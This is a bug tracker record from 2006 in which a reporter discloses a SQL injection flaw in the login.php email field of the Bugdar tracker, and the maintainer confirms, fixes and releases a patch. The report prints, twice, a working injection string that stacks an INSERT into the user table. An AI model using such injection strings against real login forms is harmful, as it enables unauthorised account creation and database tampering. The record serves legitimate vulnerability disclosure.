SyndicateVotes
For: 0 (0%)
Against: 0 (0%)
Total: 0
October 12, 2006 02:30 PM
Michael von Känel
I think on login.php could be a issue.
you can spimly enter in the email field on login.php a sql String.
Try add this one:
'; INSERT INTO `user` ( `userid` , `email` , `displayname` , `usergroupid` , `password` , `salt` , `authkey` , `showemail` , `showcolors` , `languageid` , `timezone` , `usedst` , `hidestatuses` , `defaultsortkey` , `defaultsortas` ) VALUES ('', 'got', 'you', '0', '', '', '', '0', NULL , '0', '0', '0', '', NULL , NULL); -- '
you can spimly enter in the email field on login.php a sql String.
Try add this one:
'; INSERT INTO `user` ( `userid` , `email` , `displayname` , `usergroupid` , `password` , `salt` , `authkey` , `showemail` , `showcolors` , `languageid` , `timezone` , `usedst` , `hidestatuses` , `defaultsortkey` , `defaultsortas` ) VALUES ('', 'got', 'you', '0', '', '', '', '0', NULL , '0', '0', '0', '', NULL , NULL); -- '
On October 12, 2006 06:17 PM, Robert changed:
- Hidden from "0" to "1"
- Status from "Unconfirmed" to "Confirmed"
October 12, 2006 06:17 PM
Robert
Confirmed and marking security issue (hidden).
October 12, 2006 08:01 PM
Robert
I'm now in the process of auditing all the Bugdar code. A 1.1.2 release will be issued promptly once the code is security checked and retested. Thank you for bringing this to my attention.
October 13, 2006 12:31 AM
Robert
Thank you for your bug report. This issue has been closed and fixed in Subversion. This change will be available in a future release, but you can download the change at any time from the Subversion server.
On October 13, 2006 12:31 AM, Robert changed:
- Status from "Confirmed" to "Closed"
- Resolution from "Open" to "Fixed"
- Fixed in Revision from "" to "1248"
October 13, 2006 12:50 AM
Robert
Bugdar 1.1.2 is now released with this and two other security issues resolved. Unmarking as security and making visible.
On October 13, 2006 12:50 AM, Robert changed:
- Hidden from "1" to ""